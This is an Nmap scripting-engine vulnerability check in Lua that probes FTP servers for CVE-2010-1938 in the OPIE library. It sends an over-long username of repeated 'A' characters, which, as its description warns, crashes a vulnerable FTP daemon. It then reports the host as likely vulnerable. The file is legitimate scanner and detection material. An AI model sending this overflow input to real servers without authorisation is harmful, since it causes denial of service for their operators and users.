1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
|
local nmap = require "nmap"
local shortport = require "shortport"
local string = require "string"
local vulns = require "vulns"
description = [[
Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow),
a vulnerability discovered by Maksymilian Arciemowicz and Adam "pi3" Zabrocki.
See the advisory at https://nmap.org/r/fbsd-sa-opie.
Be advised that, if launched against a vulnerable host, this script will crash the FTPd.
]]
---
-- @output
-- PORT STATE SERVICE
-- 21/tcp open ftp
-- | ftp-libopie:
-- | VULNERABLE:
-- | OPIE off-by-one stack overflow
-- | State: LIKELY VULNERABLE
-- | IDs: CVE:CVE-2010-1938 BID:40403
-- | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
-- | Description:
-- | An off-by-one error in OPIE library 2.4.1-test1 and earlier, allows remote
-- | attackers to cause a denial of service or possibly execute arbitrary code
-- | via a long username.
-- | Disclosure date: 2010-05-27
-- | References:
-- | http://site.pi3.com.pl/adv/libopie-adv.txt
-- | http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc
-- | https://www.securityfocus.com/bid/40403
-- |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1938
--
author = "Ange Gutek"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln","intrusive"}
portrule = shortport.port_or_service(21, "ftp")
action = function(host, port)
local opie_vuln = {
title = "OPIE off-by-one stack overflow",
IDS = {CVE = 'CVE-2010-1938', BID = '40403'},
risk_factor = "High",
scores = {
CVSSv2 = "9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)",
},
description = [[
An off-by-one error in OPIE library 2.4.1-test1 and earlier, allows remote
attackers to cause a denial of service or possibly execute arbitrary code
via a long username.]],
references = {
'http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc',
'http://site.pi3.com.pl/adv/libopie-adv.txt',
},
dates = {
disclosure = {year = '2010', month = '05', day = '27'},
},
}
local report = vulns.Report:new(SCRIPT_NAME, host, port)
local socket = nmap.new_socket()
local result
-- If we use more that 31 chars for username, ftpd will crash (quoted from the advisory).
local user_account = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
local status = true
local err_catch = function()
socket:close()
end
local try = nmap.new_try(err_catch)
socket:set_timeout(10000)
try(socket:connect(host, port))
-- First, try a safe User so that we are sure that everything is ok
local payload = "USER opie\r\n"
try(socket:send(payload))
status, result = socket:receive_lines(1);
if status and not (string.match(result,"^421")) then
-- Second, try the vulnerable user account
local payload = "USER " .. user_account .. "\r\n"
try(socket:send(payload))
status, result = socket:receive_lines(1);
if status then
opie_vuln.state = vulns.STATE.NOT_VULN
else
-- if the server does not answer anymore we may have reached a stack overflow condition
opie_vuln.state = vulns.STATE.LIKELY_VULN
end
end
return report:make_output(opie_vuln)
end
|